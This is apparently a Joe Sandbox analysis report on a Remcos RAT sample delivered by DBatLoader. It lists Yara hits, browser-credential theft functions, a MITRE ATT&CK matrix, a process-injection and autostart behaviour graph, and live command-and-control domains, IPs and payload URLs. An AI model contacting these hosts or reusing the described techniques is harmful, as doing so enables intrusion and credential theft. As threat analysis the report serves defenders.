              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_2913BA4D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040BA4D
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_2913BB6B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db8_2_2913BB6B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040BB6B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db15_2_0040BB6B

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe8_2_2913569A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe15_2_0040569A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              Valid Accounts              		1
              Bypass User Account Control              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		1
              Windows Service              		1
              Valid Accounts              		2
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		11
              Access Token Manipulation              		1
              Timestomp              		NTDS1
              System Network Connections Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Windows Service              		1
              DLL Side-Loading              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts421
              Process Injection              		1
              Bypass User Account Control              		Cached Domain Credentials45
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder              		311
              Masquerading              		DCSync241
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Valid Accounts              		Proc Filesystem2
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow2
              Process Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Access Token Manipulation              		Network Sniffing1
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd421
              Process Injection              		Input Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562864 Sample: jlPBMMQbXC.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 48 honeypotresearchteam.duckdns.org 2->48 50 pentester0.accesscam.org 2->50 52 8 other IPs or domains 2->52 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 78 14 other signatures 2->78 8 jlPBMMQbXC.exe 1 6 2->8         started        13 Selebzih.PIF 2->13         started        15 Selebzih.PIF 2->15         started        signatures3 76 Uses dynamic DNS services 48->76 process4 dnsIp5 54 lightstone.ae 162.19.139.102, 443, 49745, 49746 CENTURYLINK-US-LEGACY-QWESTUS United States 8->54 56 dual-spo-0005.spo-msedge.net 13.107.136.10, 443, 49722, 49723 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->56 40 C:\Users\Public\Selebzih.url, MS 8->40 dropped 42 C:\Users\Public\Libraries\Selebzih, data 8->42 dropped 80 Writes to foreign memory regions 8->80 82 Allocates memory in foreign processes 8->82 84 Creates a thread in another existing process (thread injection) 8->84 86 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->86 17 SndVol.exe 3 8->17         started        21 cmd.exe 1 8->21         started        23 esentutl.exe 2 8->23         started        88 Injects a PE file into a foreign processes 13->88 26 colorcpl.exe 13->26         started        90 Antivirus detection for dropped file 15->90 92 Multi AV Scanner detection for dropped file 15->92 94 Machine Learning detection for dropped file 15->94 28 SndVol.exe 15->28         started        file6 signatures7 process8 dnsIp9 46 honeypotresearchteam.duckdns.org 103.186.117.159, 13939, 49763, 49813 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 17->46 58 Contains functionality to bypass UAC (CMSTPLUA) 17->58 60 Contains functionalty to change the wallpaper 17->60 62 Contains functionality to steal Chrome passwords or cookies 17->62 64 Contains functionality to register a low level keyboard hook 17->64 30 esentutl.exe 2 21->30         started        34 conhost.exe 21->34         started        38 C:\Users\Public\Libraries\Selebzih.PIF, PE32 23->38 dropped 36 conhost.exe 23->36         started        66 Contains functionality to steal Firefox passwords or cookies 26->66 68 Delayed program exit found 26->68 file10 signatures11 process12 file13 44 C:\Users\Public\alpha.pif, PE32 30->44 dropped 96 Drops PE files to the user root directory 30->96 98 Drops PE files with a suspicious file extension 30->98 100 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 30->100 signatures14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              jlPBMMQbXC.exe63%ReversingLabsWin32.Trojan.ModiLoader
              jlPBMMQbXC.exe100%AviraTR/AD.Nekark.mucip
              jlPBMMQbXC.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Selebzih.PIF100%AviraTR/AD.Nekark.mucip
              C:\Users\Public\Libraries\Selebzih.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Selebzih.PIF63%ReversingLabsWin32.Trojan.ModiLoader
              C:\Users\Public\alpha.pif0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://lightstone.ae/image/233_Selebzihtihv0%Avira URL Cloudsafe
              https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ0%Avira URL Cloudsafe
              http://hydros.8k.com0%Avira URL Cloudsafe
              https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK0%Avira URL Cloudsafe
              https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z0%Avira URL Cloudsafe
              https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=10%Avira URL Cloudsafe
              archived.zapto.org100%Avira URL Cloudmalware
              pentester0.accesscam.org0%Avira URL Cloudsafe
              https://alfanar01-my.sharepoint.com/0%Avira URL Cloudsafe
              https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=10%Avira URL Cloudsafe
              honeypotresearchteam.duckdns.org100%Avira URL Cloudmalware
              https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQ0%Avira URL Cloudsafe
              https://lightstone.ae/0%Avira URL Cloudsafe
              https://lightstone.ae/image/233_Selebzihtih0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              dual-spo-0005.spo-msedge.net
              		13.107.136.10
              		truefalse
                		high
                lightstone.ae
                		162.19.139.102
                		truetrue
                  		unknown
                  pentester0.accesscam.org
                  		103.186.117.159
                  		truetrue
                    		unknown
                    honeypotresearchteam.duckdns.org
                    		103.186.117.159
                    		truetrue
                      		unknown
                      alfanar01-my.sharepoint.com
                      		unknown
                      		unknowntrue
                        		unknown
                        archived.zapto.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1false
                          • Avira URL Cloud: safe
                          		unknown
                          pentester0.accesscam.orgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          archived.zapto.orgtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1true
                          • Avira URL Cloud: safe
                          		unknown
                          honeypotresearchteam.duckdns.orgtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://lightstone.ae/image/233_Selebzihtihtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://lightstone.ae/image/233_SelebzihtihvjlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://sectigo.com/CPS0jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.sectigo.com0jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJjlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000802000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1ZjlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKjlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://hydros.8k.comjlPBMMQbXC.exe, Selebzih.PIF.7.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://geoplugin.net/json.gpSndVol.exe, colorcpl.exefalse
                                        		high
                                        http://geoplugin.net/json.gp/CSndVol.exe, 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://alfanar01-my.sharepoint.com/jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusertjlPBMMQbXC.exe, 00000000.00000003.1491083792.000000000083E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.pmail.comjlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQjlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ocsp.sectigo.com0CjlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://lightstone.ae/jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000834000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                13.107.136.10
                                                		dual-spo-0005.spo-msedge.netUnited States
                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                162.19.139.102
                                                		lightstone.aeUnited States
                                                		209CENTURYLINK-US-LEGACY-QWESTUStrue
                                                103.186.117.159
                                                		pentester0.accesscam.orgunknown
                                                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562864
                                                Start date and time:2024-11-26 08:11:11 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 11m 35s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:19
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:jlPBMMQbXC.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561.exe
                                                Detection:MAL
                                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@18/8@14/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 73
                                                • Number of non-executed functions: 239
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 189749-ipv4v6e.farm.dprodmgd104.sharepointonline.com.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: jlPBMMQbXC.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:12:09API Interceptor2x Sleep call for process: jlPBMMQbXC.exe modified
                                                02:12:38API Interceptor2x Sleep call for process: Selebzih.PIF modified
                                                02:13:05API Interceptor3359673x Sleep call for process: SndVol.exe modified
                                                07:12:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Selebzih C:\Users\Public\Selebzih.url
                                                07:12:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Selebzih C:\Users\Public\Selebzih.url

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                13.107.136.10http://algestconsulting20-my.sharepoint.com/:f:/g/personal/jacques_cangah_algest-consulting_com/EkolIGllKGRKhe-gd4i73uMBzF46oqcv00d-WXGnz9D-FwGet hashmaliciousUnknownBrowse
                                                • algestconsulting20-my.sharepoint.com/:f:/g/personal/jacques_cangah_algest-consulting_com/EkolIGllKGRKhe-gd4i73uMBzF46oqcv00d-WXGnz9D-Fw
                                                http://bombeirosamora-my.sharepoint.com/:o:/g/personal/geral_comando_bombeirosamora_pt/EqT53jeWO6ZGkv1O_1FowosB2CSGfrKDmTZiEPPt31Ds7gGet hashmaliciousHTMLPhisherBrowse
                                                • bombeirosamora-my.sharepoint.com/:o:/g/personal/geral_comando_bombeirosamora_pt/EqT53jeWO6ZGkv1O_1FowosB2CSGfrKDmTZiEPPt31Ds7g
                                                http://midlandlangarsevasociety-my.sharepoint.com/:w:/g/personal/sharon_bharaj_mlss_org_uk/EWiGFFYhPhtPjz5jsZdcRooBPGLh-q5SsgwgIhmP7JCmAgGet hashmaliciousHTMLPhisherBrowse
                                                • midlandlangarsevasociety-my.sharepoint.com/:w:/g/personal/sharon_bharaj_mlss_org_uk/EWiGFFYhPhtPjz5jsZdcRooBPGLh-q5SsgwgIhmP7JCmAg
                                                103.186.117.159kJRELa7CL3.exeGet hashmaliciousDBatLoader, RemcosBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  honeypotresearchteam.duckdns.orgnWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 178.162.204.238
                                                  pentester0.accesscam.orgkJRELa7CL3.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 103.186.117.159
                                                  nWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 178.162.204.238
                                                  p7c0yHVLB6.exeGet hashmaliciousRemcosBrowse
                                                  • 141.95.136.82
                                                  rRhJnzhWEd.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 51.178.112.40
                                                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 51.178.112.40
                                                  BOQ-Al Gurg Automation Project.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 51.178.112.40
                                                  file.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 57.128.132.196
                                                  arch-sketch-002993.dwg.pif.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 151.80.223.229
                                                  Drawing.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 151.80.223.229
                                                  BOQ-523-2022 R01.pdf.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 151.80.223.229
                                                  dual-spo-0005.spo-msedge.nethttps://tmacog-my.sharepoint.com/:f:/g/personal/bechsteinm_tmacog_org/EhlK4Xsd02RCkKBp5naSkjkBOE0y5JIGJchJIGq_xqq50Q?e=5%3abaznzS&at=9&xsdata=MDV8MDJ8Ymhvb3BlckBiZ3N1LmVkdXwxYTg0MTFlMjdjMzQ0NWU4MTcwZjA4ZGQwZDZiOGQzM3xjZGNiNzI5ZDUxMDY0ZDdjYjc1YmEzMGM0NTVkNWIwYXwwfDB8NjM4NjgxNDc3ODAwNDk3OTg2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=VldHeThDNE1GNDFhUVA3VUJFZzEwL2JHVDN6U1BIcVM3bzE4cklKOGVJbz0%3d&clickparams=eyAiWC1BcHBOYW1lIiA6ICJNaWNyb3NvZnQgT3V0bG9vayIsICJYLUFwcFZlcnNpb24iIDogIjE2LjAuMTczMjguMjA2MTIiLCAiT1MiIDogIldpbmRvd3MiIH0%3DGet hashmaliciousHTMLPhisherBrowse
                                                  • 13.107.136.10
                                                  https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2Get hashmaliciousHTMLPhisherBrowse
                                                  • 13.107.136.10
                                                  Quote Request.emlGet hashmaliciousHTMLPhisherBrowse
                                                  • 13.107.136.10
                                                  https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.microGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  https://tractopieces35-my.sharepoint.com/:o:/g/personal/lecomte22_tracto-pieces_fr/EqM9FMd6batFtzMgdv1f2XUBmLAJecWys730N_AOVrXnXA?e=3TLKO8Get hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
